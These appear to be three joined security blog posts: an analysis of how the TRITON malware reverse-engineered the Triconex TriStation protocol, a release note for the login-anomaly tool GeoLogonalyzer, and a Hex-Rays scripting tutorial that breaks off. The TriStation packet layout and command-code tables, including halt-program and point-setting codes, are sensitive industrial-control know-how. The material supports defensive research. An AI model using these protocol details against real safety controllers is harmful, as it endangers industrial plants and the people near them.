TsLow.pyc (Figure 1) contains several pieces of code for error handling, but these also present some cues to the protocol structure.


Figure 1: TsLow.pyc function print_last_error()

In the TsLow.pyc’s function for print_last_error we see error handling for “TCM Error”. This compares the TriStation packet value at offset 0 with a value in a corresponding array from TS_cnames.pyc (Figure 2), which is largely used as a “dictionary” for the protocol.


Figure 2: TS_cnames.pyc TS_cst array

From this we can infer that offset 0 of the TriStation protocol contains message types. This is supported by an additional function, tcm_result, which declares type, size = struct.unpack('<HH', data_received[0:4]), stating that the first two bytes should be handled as integer type and the second two bytes are integer size of the TriStation message. This is our first glimpse into what the threat actor(s) understood about the TriStation protocol.

Since there are only 11 defined message types, it really doesn't matter much if the type is one byte or two because the second byte will always be 0x00.

We also have indications that message type 5 is for all Execution Command Requests and Responses, so it is curious to observe that the TRITON developers called this “Command Reply.” (We won’t understand this naming convention until later.)

Next we examine TsLow.pyc’s print_last_error function (Figure 3) to look at “TS Error” and “TS_names.” We begin by looking at the ts_err variable and see that it references ts_result.


Figure 3: TsLow.pyc function print_last_error() with ts_err highlighted

We follow that thread to ts_result, which defines a few variables in the next 10 bytes (Figure 4): dir, cid, cmd, cnt, unk, cks, siz = struct.unpack('<, ts_packet[0:10]). Now things are heating up. What fun. There’s a lot to unpack here, but the most interesting thing is how this piece script breaks down 10 bytes from ts_packet into different variables.


Figure 4: ts_result with ts_packet header variables highlighted


Figure 5: tcm_result

Referencing tcm_result (Figure 5) we see that it defines type and size as the first four bytes (offset 0 – 3) and tcm_result returns the packet bytes 4:-2 (offset 4 to the end minus 2, because the last two bytes are the CRC-16 checksum). Now that we know where tcm_result leaves off, we know that the ts_reply “cmd” is a single byte at offset 6, and corresponds to the values in the TS_cnames.pyc array and TS_names (Figure 6). The TRITON script also tells us that any integer value over 100 is a likely “command reply.” Sweet.

When looking back at the ts_result packet header definitions, we begin to see some gaps in the TRITON developer's knowledge: dir, cid, cmd, cnt, unk, cks, siz = struct.unpack('<, ts_packet[0:10]). We're clearly speculating based on naming conventions, but we get an impression that offsets 4, 5 and 6 could be "direction", "controller ID" and "command", respectively. Values such as "unk" show that the developer either did not know or did not care to identify this value. We suspect it is a constant, but this value is still unknown to us.


Figure 6: Excerpt TS_cnames.pyc TS_names array, which contain TRITON actor’s notes for execution command function codes

TriStation Protocol Packet Structure

The TRITON threat actor’s knowledge and reverse engineering effort provides us a better understanding of the protocol. From here we can start to form a more complete picture and document the basic functionality of TriStation. We are primarily interested in message type 5, Execution Command, which best illustrates the overall structure of the protocol. Other, smaller message types will have varying structure.


Figure 7: Sample TriStation "Allocate Program" Execution Command, with color annotation and protocol legend

Corroborating the TriStation Analysis

Minute discrepancies aside, the TriStation structure detailed in Figure 7 is supported by other public analyses. Foremost, researchers from the Coordinated Science Laboratory (CSL) at University of Illinois at Urbana-Champaign published a 2017 paper titled "Attack Induced Common-Mode Failures on PLC-based Safety System in a Nuclear Power Plant". The CSL team mentions that they used the Triconex System Access Application (TSAA) protocol to reverse engineer elements of the TriStation protocol. TSAA is a protocol developed by the same company as TriStation. Unlike TriStation, the TSAA protocol structure is described within official documentation. CSL assessed similarities between the two protocols would exist and they leveraged TSAA to better understand TriStation. The team's overall research and analysis of the general packet structure aligns with our TRITON-sourced packet structure.

There are some awesome blog posts and whitepapers out there that support our findings in one way or another. Writeups by Midnight Blue Labs, Accenture, and US-CERT each explain how the TRITON framework relates to the TriStation protocol in superb detail.

TriStation's Reverse Engineering and TRITON's Development

When TRITON was discovered, we began to wonder how the TRITON actor reverse engineered TriStation and implemented it into the framework. We have a lot of theories, all of which seemed plausible: Did they build, buy, borrow, or steal? Or some combination thereof?

Our initial theory was that the threat actor purchased a Triconex controller and software for their own testing and reverse engineering from the "ground up", although if this was the case we do not believe they had a controller with the exact vulnerable firmware version, else they would have had fewer problems with TRITON in practice at the victim site. They may have bought or used a demo version of the TriStation 1131 software, allowing them to reverse engineer enough of TriStation for the framework. They may have stolen TriStation Python libraries from ICS companies, subsidiaries or system integrators and used the stolen material as a base for TriStation and TRITON development. But then again, it is possible that they borrowed TriStation software, Triconex hardware and Python connectors from government-owned utility that was using them legitimately.

Looking at the raw TRITON code, some of the comments may appear oddly phrased, but we do get a sense that the developer is clearly using many of the right vernacular and acronyms, showing smarts on PLC programming. The TS_cnames.pyc script contains interesting typos such as 'Set lable', 'Alocate network accepted', 'Symbol table ccepted' and 'Set program information reponse'. These appear to be normal human error and reflect neither poor written English nor laziness in coding. The significant amount of annotation, cascading logic, and robust error handling throughout the code suggests thoughtful development and testing of the framework. This complicates the theory of "ground up" development, so did they base their code on something else?

While learning from the TriStation functionality within TRITON, we continued to explore legitimate TriStation software. We began our search for "TS1131.exe" and hit dead ends sorting through TriStation DLLs until we came across a variety of TriStation utilities in MSI form. We ultimately stumbled across a juicy archive containing "Trilog v4." Upon further inspection, this file installed "TriLog.exe," which the original TRITON executable mimicked, and a couple of supporting DLLs, all of which were timestamped around August 2006.

When we saw the DLL file description "Tricon Communications Interface" and original file name "TricCom.DLL", we knew we were in the right place. With a simple look at the file strings, "BAZINGA!" We struck gold.

File Name

tr1com40.dll

MD5

069247DF527A96A0E048732CA57E7D3D

Size

110592

Compile Date

2006-08-23

File Description

Tricon Communications Interface

Product Name

TricCom Dynamic Link Library

File Version

4.2.441

Original File Name

TricCom.DLL

Copyright

Copyright © 1993-2006 Triconex Corporation

The tr1com40.DLL is exactly what you would expect to see in a custom application package. It is a library that helps support the communications for a Triconex controller. If you've pored over TRITON as much as we have, the moment you look at strings you can see the obvious overlaps between the legitimate DLL and TRITON's own TS_cnames.pyc.


Figure 8: Strings excerpt from tr1com40.DLL

Each of the execution command "error codes" from TS_cnames.pyc are in the strings of tr1com40.DLL (Figure 8). We see "An MP has re-educated" and "Invalid Tristation I command". Even misspelled command strings verbatim such as "Non-existant data item" and "Alocate network accepted". We also see many of the same unknown values. What is obvious from this discovery is that some of the strings in TRITON are likely based on code used in communications libraries for Trident and Tricon controllers.

In our brief survey of the legitimate Triconex Corporation binaries, we observed a few samples with related string tables.

Pe:dllname

Compile Date

Reference CPP Strings Code

Lagcom40.dll

2004/11/19

$Workfile:   LAGSTRS.CPP  $ $Modtime:   Jul 21 1999 17:17:26  $ $Revision:   1.0

Tr1com40.dll

2006/08/23

$Workfile:   TR1STRS.CPP  $ $Modtime:   May 16 2006 09:55:20  $ $Revision:   1.4

Tridcom.dll

2008/07/23

$Workfile:   LAGSTRS.CPP  $ $Modtime:   Jul 21 1999 17:17:26  $ $Revision:   1.0

Triccom.dll

2008/07/23

$Workfile:   TR1STRS.CPP  $ $Modtime:   May 16 2006 09:55:20  $ $Revision:   1.4

Tridcom.dll

2010/09/29

$Workfile:   LAGSTRS.CPP  $ $Modtime:   Jul 21 1999 17:17:26  $ $Revision:   1.0 

Tr1com.dll

2011/04/27

$Workfile:   TR1STRS.CPP  $ $Modtime:   May 16 2006 09:55:20  $ $Revision:   1.4

Lagcom.dll

2011/04/27

$Workfile:   LAGSTRS.CPP  $ $Modtime:   Jul 21 1999 17:17:26  $ $Revision:   1.0

Triccom.dll

2011/04/27

$Workfile:   TR1STRS.CPP  $ $Modtime:   May 16 2006 09:55:20  $ $Revision:   1.4

We extracted the CPP string tables in TR1STRS and LAGSTRS and the TS_cnames.pyc TS_names array from TRITON, and compared the 210, 204, and 212 relevant strings from each respective file.

TS_cnames.pyc TS_names and tr1com40.dll share 202 of 220 combined table strings. The remaining strings are unique to each, as seen here:

TS_cnames.TS_names (2017 pyc)

Tr1com40.dll (2006 CPP)

Go to DOWNLOAD mode

<200>

Not set

<209>

Unk75

Bad message from module

Unk76

Bad message type

Unk77

Bad TMI version number

Unk78

Module did not respond

Unk79

Open Connection: Invalid SAP %d

Unk81

Unsupported message for this TMI version

Unk83

 

Wrong command

 

TS_cnames.pyc TS_names and Tridcom.dll (1999 CPP) shared only 151 of 268 combined table strings, showing a much smaller overlap with the seemingly older CPP library. This makes sense based on the context that Tridcom.dll is meant for a Trident controller, not a Tricon controller. It does seem as though Tr1com40.dll and TR1STRS.CPP code was based on older work.

We are not shocked to find that the threat actor reversed legitimate code to bolster development of the TRITON framework. They want to work smarter, not harder, too. But after reverse engineering legitimate software and implementing the basics of the TriStation, the threat actors still had an incomplete understanding of the protocol. In TRITON's TS_cnames.pyc we saw "Unk75", "Unk76", "Unk83" and other values that were not present in the tr1com40.DLL strings, indicating that the TRITON threat actor may have explored the protocol and annotated their findings beyond what they reverse engineered from the DLL. The gaps in TriStation implementation show us why the actors encountered problems interacting with the Triconex controllers when using TRITON in the wild.

You can see more of the Trilog and Triconex DLL files on VirusTotal.

Item Name

MD5

Description

Tr1com40.dll

069247df527a96a0e048732ca57e7d3d

Tricom Communcations DLL

Data1.cab

e6a3c93a6d433cbaf6f573b6c09d76c4

Parent of Tr1com40.dll

Trilog v4.1.360R

13a3b83ba2c4236ca59aba679941c8a5

RAR Archive of TriLog

TridCom.dll

5c2ed617fdec4779cb33c89082a43100

Trident Communications DLL

Afterthoughts

Seeing Triconex systems targeted with malicious intent was new to the world six months ago. Moving forward it would be reasonable to anticipate additional frameworks, such as TRITON, designed for usage against other SIS controllers and associated technologies. If Triconex was within scope, we may see similar attacker methodologies affecting the dominant industrial safety technologies.

Basic security measures do little to thwart truly persistent threat actors and monitoring only IT networks is not an ideal situation. Visibility into both the IT and OT environments is critical for detecting the various stages of an ICS intrusion. Simple detection concepts such as baseline deviation can provide insight into abnormal activity.

While the TRITON framework was actively in use, how many traditional ICS “alarms” were set off while the actors tested their exploits and backdoors on the Triconex controller? How many times did the TriStation protocol, as implemented in their Python scripts, fail or cause errors because of non-standard traffic? How many TriStation UDP pings were sent and how many Connection Requests? How did these statistics compare to the baseline for TriStation traffic? There are no answers to these questions for now. We believe that we can identify these anomalies in the long run if we strive for increased visibility into ICS technologies.

We hope that by holding public discussions about ICS technologies, the Infosec community can cultivate closer relationships with ICS vendors and give the world better insight into how attackers move from the IT to the OT space. We want to foster more conversations like this and generally share good techniques for finding evil. Since most of all ICS attacks involve standard IT intrusions, we should probably come together to invent and improve any guidelines for how to monitor PCs and engineering workstations that bridge the IT and OT networks. We envision a world where attacking or disrupting ICS operations costs the threat actor their cover, their toolkits, their time, and their freedom. It's an ideal world, but something nice to shoot for.

Thanks and Future Work

There is still much to do for TRITON and TriStation. There are many more sub-message types and nuances for parsing out the nitty gritty details, which is hard to do without a controller of our own. And although we’ve published much of what we learned about the TriStation here on the blog, our work will continue as we continue our study of the protocol.

Thanks to everyone who did so much public research on TRITON and TriStation. We have cited a few individuals in this blog post, but there is a lot more community-sourced information that gave us clues and leads for our research and testing of the framework and protocol. We also have to acknowledge the research performed by the TRITON attackers. We borrowed a lot of your knowledge about TriStation from the TRITON framework itself.

Finally, remember that we're here to collaborate. We think most of our research is right, but if you notice any errors or omissions, or have ideas for improvements, please spear phish contact: smiller@fireeye.com.

Recommended Reading

Appendix A: TriStation Message Type Codes

The following table consists of hex values at offset 0 in the TriStation UDP packets and the associated dictionary definitions, extracted verbatim from the TRITON framework in library TS_cnames.pyc.

Value at 0x0

Message Type

1

Connection Request

2

Connection Response

3

Disconnect Request

4

Disconnect Response

5

Execution Command

6

Ping Command

7

Connection Limit Reached

8

Not Connected

9

MPS Are Dead

10

Access Denied

11

Connection Failed

Appendix B: TriStation Execution Command Function Codes

The following table consists of hex values at offset 6 in the TriStation UDP packets and the associated dictionary definitions, extracted verbatim from the TRITON framework in library TS_cnames.pyc.

Value at 0x6

TS_cnames String

0

0: 'Start download all',

1

1: 'Start download change',

2

2: 'Update configuration',

3

3: 'Upload configuration',

4

4: 'Set I/O addresses',

5

5: 'Allocate network',

6

6: 'Load vector table',

7

7: 'Set calendar',

8

8: 'Get calendar',

9

9: 'Set scan time',

A

10: 'End download all',

B

11: 'End download change',

C

12: 'Cancel download change',

D

13: 'Attach TRICON',

E

14: 'Set I/O address limits',

F

15: 'Configure module',

10

16: 'Set multiple point values',

11

17: 'Enable all points',

12

18: 'Upload vector table',

13

19: 'Get CP status ',

14

20: 'Run program',

15

21: 'Halt program',

16

22: 'Pause program',

17

23: 'Do single scan',

18

24: 'Get chassis status',

19

25: 'Get minimum scan time',

1A

26: 'Set node number',

1B

27: 'Set I/O point values',

1C

28: 'Get I/O point values',

1D

29: 'Get MP status',

1E

30: 'Set retentive values',

1F

31: 'Adjust clock calendar',

20

32: 'Clear module alarms',

21

33: 'Get event log',

22

34: 'Set SOE block',

23

35: 'Record event log',

24

36: 'Get SOE data',

25

37: 'Enable OVD',

26

38: 'Disable OVD',

27

39: 'Enable all OVDs',

28

40: 'Disable all OVDs',

29

41: 'Process MODBUS',

2A

42: 'Upload network',

2B

43: 'Set lable',

2C

44: 'Configure system variables',

2D

45: 'Deconfigure module',

2E

46: 'Get system variables',

2F

47: 'Get module types',

30

48: 'Begin conversion table download',

31

49: 'Continue conversion table download',

32

50: 'End conversion table download',

33

51: 'Get conversion table',

34

52: 'Set ICM status',

35

53: 'Broadcast SOE data available',

36

54: 'Get module versions',

37

55: 'Allocate program',

38

56: 'Allocate function',

39

57: 'Clear retentives',

3A

58: 'Set initial values',

3B

59: 'Start TS2 program download',

3C

60: 'Set TS2 data area',

3D

61: 'Get TS2 data',

3E

62: 'Set TS2 data',

3F

63: 'Set program information',

40

64: 'Get program information',

41

65: 'Upload program',

42

66: 'Upload function',

43

67: 'Get point groups',

44

68: 'Allocate symbol table',

45

69: 'Get I/O address',

46

70: 'Resend I/O address',

47

71: 'Get program timing',

48

72: 'Allocate multiple functions',

49

73: 'Get node number',

4A

74: 'Get symbol table',

4B

75: 'Unk75',

4C

76: 'Unk76',

4D

77: 'Unk77',

4E

78: 'Unk78',

4F

79: 'Unk79',

50

80: 'Go to DOWNLOAD mode',

51

81: 'Unk81',

52

 

53

83: 'Unk83',

54

 

55

 

56

 

57

 

58

 

59

 

5A

 

5B

 

5C

 

5D

 

5E

 

5F

 

60

 

61

 

62

 

63

 

64

100: 'Command rejected',

65

101: 'Download all permitted',

66

102: 'Download change permitted',

67

103: 'Modification accepted',

68

104: 'Download cancelled',

69

105: 'Program accepted',

6A

106: 'TRICON attached',

6B

107: 'I/O addresses set',

6C

108: 'Get CP status response',

6D

109: 'Program is running',

6E

110: 'Program is halted',

6F

111: 'Program is paused',

70

112: 'End of single scan',

71

113: 'Get chassis configuration response',

72

114: 'Scan period modified',

73

115: '<115>',

74

116: '<116>',

75

117: 'Module configured',

76

118: '<118>',

77

119: 'Get chassis status response',

78

120: 'Vectors response',

79

121: 'Get I/O point values response',

7A

122: 'Calendar changed',

7B

123: 'Configuration updated',

7C

124: 'Get minimum scan time response',

7D

125: '<125>',

7E

126: 'Node number set',

7F

127: 'Get MP status response',

80

128: 'Retentive values set',

81

129: 'SOE block set',

82

130: 'Module alarms cleared',

83

131: 'Get event log response',

84

132: 'Symbol table ccepted',

85

133: 'OVD enable accepted',

86

134: 'OVD disable accepted',

87

135: 'Record event log response',

88

136: 'Upload network response',

89

137: 'Get SOE data response',

8A

138: 'Alocate network accepted',

8B

139: 'Load vector table accepted',

8C

140: 'Get calendar response',

8D

141: 'Label set',

8E

142: 'Get module types response',

8F

143: 'System variables configured',

90

144: 'Module deconfigured',

91

145: '<145>',

92

146: '<146>',

93

147: 'Get conversion table response',

94

148: 'ICM print data sent',

95

149: 'Set ICM status response',

96

150: 'Get system variables response',

97

151: 'Get module versions response',

98

152: 'Process MODBUS response',

99

153: 'Allocate program response',

9A

154: 'Allocate function response',

9B

155: 'Clear retentives response',

9C

156: 'Set initial values response',

9D

157: 'Set TS2 data area response',

9E

158: 'Get TS2 data response',

9F

159: 'Set TS2 data response',

A0

160: 'Set program information reponse',

A1

161: 'Get program information response',

A2

162: 'Upload program response',

A3

163: 'Upload function response',

A4

164: 'Get point groups response',

A5

165: 'Allocate symbol table response',

A6

166: 'Program timing response',

A7

167: 'Disable points full',

A8

168: 'Allocate multiple functions response',

A9

169: 'Get node number response',

AA

170: 'Symbol table response',

AB

 

AC

 

AD

 

AE

 

AF

 

B0

 

B1

 

B2

 

B3

 

B4

 

B5

 

B6

 

B7

 

B8

 

B9

 

BA

 

BB

 

BC

 

BD

 

BE

 

BF

 

C0

 

C1

 

C2

 

C3

 

C4

 

C5

 

C6

 

C7

 

C8

200: 'Wrong command',

C9

201: 'Load is in progress',

CA

202: 'Bad clock calendar data',

CB

203: 'Control program not halted',

CC

204: 'Control program checksum error',

CD

205: 'No memory available',

CE

206: 'Control program not valid',

CF

207: 'Not loading a control program',

D0

208: 'Network is out of range',

D1

209: 'Not enough arguments',

D2

210: 'A Network is missing',

D3

211: 'The download time mismatches',

D4

212: 'Key setting prohibits this operation',

D5

213: 'Bad control program version',

D6

214: 'Command not in correct sequence',

D7

215: '<215>',

D8

216: 'Bad Index for a module',

D9

217: 'Module address is invalid',

DA

218: '<218>',

DB

219: '<219>',

DC

220: 'Bad offset for an I/O point',

DD

221: 'Invalid point type',

DE

222: 'Invalid Point Location',

DF

223: 'Program name is invalid',

E0

224: '<224>',

E1

225: '<225>',

E2

226: '<226>',

E3

227: 'Invalid module type',

E4

228: '<228>',

E5

229: 'Invalid table type',

E6

230: '<230>',

E7

231: 'Invalid network continuation',

E8

232: 'Invalid scan time',

E9

233: 'Load is busy',

EA

234: 'An MP has re-educated',

EB

235: 'Invalid chassis or slot',

EC

236: 'Invalid SOE number',

ED

237: 'Invalid SOE type',

EE

238: 'Invalid SOE state',

EF

239: 'The variable is write protected',

F0

240: 'Node number mismatch',

F1

241: 'Command not allowed',

F2

242: 'Invalid sequence number',

F3

243: 'Time change on non-master TRICON',

F4

244: 'No free Tristation ports',

F5

245: 'Invalid Tristation I command',

F6

246: 'Invalid TriStation 1131 command',

F7

247: 'Only one chassis allowed',

F8

248: 'Bad variable address',

F9

249: 'Response overflow',

FA

250: 'Invalid bus',

FB

251: 'Disable is not allowed',

FC

252: 'Invalid length',

FD

253: 'Point cannot be disabled',

FE

254: 'Too many retentive variables',

FF

255: 'LOADER_CONNECT',

 

256: 'Unknown reject code'

Remote Authentication GeoFeasibility Tool – GeoLogonalyzer

Users have long needed to access important resources such as virtual private networks (VPNs), web applications, and mail servers from anywhere in the world at any time. While the ability to access resources from anywhere is imperative for employees, threat actors often leverage stolen credentials to access systems and data. Due to large volumes of remote access connections, it can be difficult to distinguish between a legitimate and a malicious login.

Today, we are releasing GeoLogonalyzer to help organizations analyze logs to identify malicious logins based on GeoFeasibility; for example, a user connecting to a VPN from New York at 13:00 is unlikely to legitimately connect to the VPN from Australia five minutes later.

Once remote authentication activity is baselined across an environment, analysts can begin to identify authentication activity that deviates from business requirements and normalized patterns, such as:

  1. User accounts that authenticate from two distant locations, and at times between which the user probably could not have physically travelled the route.
  2. User accounts that usually log on from IP addresses registered to one physical location such as a city, state, or country, but also have logons from locations where the user is not likely to be physically located.
  3. User accounts that log on from a foreign location at which no employees reside or are expected to travel to, and your organization has no business contacts at that location.
  4. User accounts that usually log on from one source IP address, subnet, or ASN, but have a small number of logons from a different source IP address, subnet, or ASN.
  5. User accounts that usually log on from home or work networks, but also have logons from an IP address registered to cloud server hosting providers.
  6. User accounts that log on from multiple source hostnames or with multiple VPN clients.

GeoLogonalyzer can help address these and similar situations by processing authentication logs containing timestamps, usernames, and source IP addresses.

GeoLogonalyzer can be downloaded from our FireEye GitHub.

GeoLogonalyzer Features

IP Address GeoFeasibility Analysis

For a remote authentication log that records a source IP address, it is possible to estimate the location each logon originated from using data such as MaxMind’s free GeoIP database. With additional information, such as a timestamp and username, analysts can identify a change in source location over time to determine if that user could have possibly traveled between those two physical locations to legitimately perform the logons.

For example, if a user account, Meghan, logged on from New York City, New York on 2017-11-24 at 10:00:00 UTC and then logged on from Los Angeles, California 10 hours later on 2017-11-24 at 20:00:00 UTC, that is roughly a 2,450 mile change over 10 hours. Meghan’s logon source change can be normalized to 245 miles per hour which is reasonable through commercial airline travel.

If a second user account, Harry, logged on from Dallas, Texas on 2017-11-25 at 17:00:00 UTC and then logged on from Sydney, Australia two hours later on 2017-11-25 at 19:00:00 UTC, that is roughly an 8,500 mile change over two hours. Harry’s logon source change can be normalized to 4,250 miles per hour, which is likely infeasible with modern travel technology.

By focusing on the changes in logon sources, analysts do not have to manually review the many times that Harry might have logged in from Dallas before and after logging on from Sydney.

Cloud Data Hosting Provider Analysis

Attackers understand that organizations may either be blocking or looking for connections from unexpected locations. One solution for attackers is to establish a proxy on either a compromised server in another country, or even through a rented server hosted in another country by companies such as AWS, DigitalOcean, or Choopa.

Fortunately, Github user “client9” tracks many datacenter hosting providers in an easily digestible format. With this information, we can attempt to detect attackers utilizing datacenter proxy to thwart GeoFeasibility analysis.

Using GeoLogonalyzer

Usable Log Sources

GeoLogonalyzer is designed to process remote access platform logs that include a timestamp, username, and source IP. Applicable log sources include, but are not limited to:

  1. VPN
  2. Email client or web applications
  3. Remote desktop environments such as Citrix
  4. Internet-facing applications
Usage

GeoLogonalyzer’s built-in –csv input type accepts CSV formatted input with the following considerations:

  1. Input must be sorted by timestamp.
  2. Input timestamps must all be in the same time zone, preferably UTC, to avoid seasonal changes such as daylight savings time.
  3. Input format must match the following CSV structure – this will likely require manually parsing or reformatting existing log formats:

YYYY-MM-DD HH:MM:SS, username, source IP, optional source hostname, optional VPN client details

GeoLogonalyzer’s code comments include instructions for adding customized log format support. Due to the various VPN log formats exported from VPN server manufacturers, version 1.0 of GeoLogonalyzer does not include support for raw VPN server logs.

GeoLogonalyzer Usage

Example Input

Figure 1 represents an example input VPNLogs.csv file that recorded eight authentication events for the two user accounts Meghan and Harry. The input data is commonly derived from logs exported directly from an application administration console or SIEM.  Note that this example dataset was created entirely for demonstration purposes.


Figure 1: Example GeoLogonalyzer input

Example Windows Executable Command

GeoLogonalyzer.exe --csv VPNLogs.csv --output GeoLogonalyzedVPNLogs.csv

Example Python Script Execution Command

python GeoLogonalyzer.py --csv VPNLogs.csv --output GeoLogonalyzedVPNLogs.csv

Example Output

Figure 2 represents the example output GeoLogonalyzedVPNLogs.csv file, which shows relevant data from the authentication source changes (highlights have been added for emphasis and some columns have been removed for brevity):


Figure 2: Example GeoLogonalyzer output

Analysis

In the example output from Figure 2, GeoLogonalyzer helps identify the following anomalies in the Harry account’s logon patterns:

  1. FAST - For Harry to physically log on from New York and subsequently from Australia in the recorded timeframe, Harry needed to travel at a speed of 4,297 miles per hour.
  2. DISTANCE – Harry’s 8,990 mile trip from New York to Australia might not be expected travel.
  3. DCH – Harry’s logon from Australia originated from an IP address associated with a datacenter hosting provider.
  4. HOSTNAME and CLIENT – Harry logged on from different systems using different VPN client software, which may be against policy.
  5. ASN – Harry’s source IP addresses did not belong to the same ASN. Using ASN analysis helps cut down on reviewing logons with different source IP addresses that belong to the same provider. Examples include logons from different campus buildings or an updated residential IP address.

Manual analysis of the data could also reveal anomalies such as:

  1. Countries or regions where no business takes place, or where there are no employees located
  2. Datacenters that are not expected
  3. ASN names that are not expected, such as a university
  4. Usernames that should not log on to the service
  5. Unapproved VPN client software names
  6. Hostnames that are not part of the environment, do not match standard naming conventions, or do not belong to the associated user

While it may be impossible to determine if a logon pattern is malicious based on this data alone, analysts can use GeoLogonalyzer to flag and investigate potentially suspicious logon activity through other investigative methods.

GeoLogonalyzer Limitations

Reserved Addresses

Any RFC1918 source IP addresses, such as 192.168.X.X and 10.X.X.X, will not have a physical location registered in the MaxMind database. By default, GeoLogonalyzer will use the coordinates (0, 0) for any reserved IP address, which may alter results. Analysts can manually edit these coordinates, if desired, by modifying the RESERVED_IP_COORDINATES constant in the Python script.

Setting this constant to the coordinates of your office location may provide the most accurate results, although may not be feasible if your organization has multiple locations or other point-to-point connections.

GeoLogonalyzer also accepts the parameter –skip_rfc1918, which will completely ignore any RFC1918 source IP addresses and could result in missed activity.

Failed Logon and Logoff Data

It may also be useful to include failed logon attempts and logoff records with the log source data to see anomalies related to source information of all VPN activity. At this time, GeoLogonalyzer does not distinguish between successful logons, failed logon attempts, and logoff events. GeoLogonalyzer also does not detect overlapping logon sessions from multiple source IP addresses.

False Positive Factors

Note that the use of VPN or other tunneling services may create false positives. For example, a user may access an application from their home office in Wyoming at 08:00 UTC, connect to a VPN service hosted in Georgia at 08:30 UTC, and access the application again through the VPN service at 09:00 UTC. GeoLogonalyzer would process this application access log and detect that the user account required a FAST travel rate of roughly 1,250 miles per hour which may appear malicious. Establishing a baseline of legitimate authentication patterns is recommended to understand false positives.

Reliance on Open Source Data

GeoLogonalyzer relies on open source data to make cloud hosting provider determinations. These lookups are only as accurate as the available open source data.

Preventing Remote Access Abuse

Understanding that no single analysis method is perfect, the following recommendations can help security teams prevent the abuse of remote access platforms and investigate suspected compromise.

  1. Identify and limit remote access platforms that allow access to sensitive information from the Internet, such as VPN servers, systems with RDP or SSH exposed, third-party applications (e.g., Citrix), intranet sites, and email infrastructure.
  2. Implement a multi-factor authentication solution that utilizes dynamically generated one-time use tokens for all remote access platforms.
  3. Ensure that remote access authentication logs for each identified access platform are recorded, forwarded to a log aggregation utility, and retained for at least one year.
  4. Whitelist IP address ranges that are confirmed as legitimate for remote access users based on baselining or physical location registrations. If whitelisting is not possible, blacklist IP address ranges registered to physical locations or cloud hosting providers that should never legitimately authenticate to your remote access portal.
  5. Utilize either SIEM capabilities or GeoLogonalyzer.py to perform GeoFeasibility analysis of all remote access on a regular frequency to establish a baseline of accounts that legitimately perform unexpected logon activity and identify new anomalies. Investigating anomalies may require contacting the owner of the user account in question. FireEye Helix analyzes live log data for all techniques utilized by GeoLogonalyzer, and more!

Download GeoLogonalyzer today.

Acknowledgements

Christopher Schmitt, Seth Summersett, Jeff Johns, and Alexander Mulfinger.

Solving Ad-hoc Problems with Hex-Rays API

Introduction

IDA Pro is the de facto standard when it comes to binary reverse engineering. Besides being a great disassembler and debugger, it is possible to extend it and include a powerful decompiler by purchasing an additional license from Hex-Rays. The ability to switch between disassembled and decompiled code can greatly reduce the analysis time.

The decompiler (from now on referred to as Hex-Rays) has been around for a long time and has achieved a good level of maturity. However, there seems to be a lack of a concise and complete resources regarding this topic (tutorials or otherwise). In this blog, we aim to close that gap by showcasing examples where scripting Hex-Rays goes a long way.

Overview of a Decompiler

In order to understand how the decompiler works, it’s helpful to first review the normal compilation process.

Compilation and decompilation center around the concept of an Abstract Syntax Tree (AST). In essence, a compiler takes the source code, splits it into tokens according to a grammar, then these tokens are grouped into logical expressions. In this phase of the compilation process, referred to as parsing, the code structure is represented as a complex object, the AST. From the AST, the compiler will produce assembly code for the specified platform.

A decompiler takes the opposite route. From the given assembly code, it works back to produce an AST, and from this to produce pseudocode.

From all the intermediate steps between code and assembly, we are stressing the AST so much because most of the time you will spend using the Hex-Rays API, you will actually be reading and/or modifying the Abstract Syntax Tree (or ctree in Hex-Rays terminology).

Items, Expressions and Statements

Now we know that Hex-Rays’s ctree is a tree-like data structure. The nodes of this tree are either of type cinsn_t or cexpr_t. We will define these in a moment, but for now it is important to know that both derive from a very basic type, namely the citem_t type, as seen in the following code snippet:

Therefore, all nodes in the ctree will have the op property, which indicates the node type (variable, number, logical expression, etc.).

The type of op (ctype_t) is an enumeration where all constants are named either cit_<xyz> (for statements) or cot_<xyz> (for expressions). Keep this in mind, as it will be very important. A quick way to inspect all ctype_t constants and their values is to execute the following code snippet:

This produces the following output:

Let’s dive a bit deeper and explain the two types of nodes: expressions and statements.

It is useful to think about expressions as the “the little logical elements” of your code. They range from simple types such as variables, strings or numerical constants, to small code constructs (assignments, comparisons, additions, logical operations, array indexing, etc.).

These are of type cexpr_t, a large structure containing several members. The members that can be accessed depend on its op value. For example, the member n to obtain the numeric value only makes sense when dealing with constants.

On the other side, we have statements. These correlate roughly to language keywords (if, for, do, while, return, etc.) Most of them are related to control flow and can be thought as “the big picture elements” of your code.

Recapitulating, we have seen how the decompiler exposes this tree-like structure (the ctree), which consists of two types of nodes: expressions and statements. In order to extract information from or modify the decompiled code, we have to interact with the ctree nodes via methods dependent on the node type. However, the following question arises: “How do we reach the nodes?”

This is done via a class exposed by Hex-Rays: the tree visitor (ctree_visitor_t). This class has two virtual methods, visit_insn and visit_expr, that are executed when a statement or expression is found while traversing the ctree. We can create our own visitor classes by inheriting from this one and overloading the corresponding methods.

Example Scripts

In this section, we will use the Hex-Rays API to solve two real-world problems:

  • Identify calls to GetProcAddress to dynamically resolve Windows APIs, assigning the resulting address to a global variable.
  • Display assignments related to stack strings as characters instead of numbers, for easier readability.

GetProcAddress

The first example we will walk through is how to automatically handle renaming global variables that have been dynamically resolved at run time. This is a common technique malware uses to hide its capabilities from static analysis tools. An example of dynamically resolving global variables using GetProcAddress is shown in Figure 1.


Figure 1: Dynamic API resolution using GetProcAddress

There are several ways to rename the global variables, with the simplest being manual copy and paste. However, this task is very repetitive and can be scripted using the Hex-Rays API.

In order to write any Hex-Rays script, it is important to first visualize the ctree. The Hex-Rays SDK includes a sample, sample5, which can be used to view the current function’s ctree. The amount of data shown in a ctree for a function can be overwhelming. A modified version of the sample was used to produce a picture of a sub-ctree for the function shown in Figure 1. The sub-ctree for the single expression: 'dword_1000B2D8 = (int)GetProcAdress(v0, "CreateThread");' is shown in Figure 2.


Figure 2: Sub-ctree for GetProcAddress assignment

With knowledge of the sub-ctree in use, we can write a script to automatically rename all the global variables that are being assigned using this method.

The code to automatically rename all the local variables is shown in Figure 3. The code works by traversing the ctree looking for calls to the GetProcAddress function. Once found, the code takes the name of the function being resolved and finds the global variable that is being set. The code then uses the IDA MakeName API to rename the address to the correct function.


Figure 3: Function renaming global variables

After the script has been executed, we can see in Figure 4 that all the global variables have been renamed to the appropriate function name.


Figure 4: Global variables renamed

Stack Strings

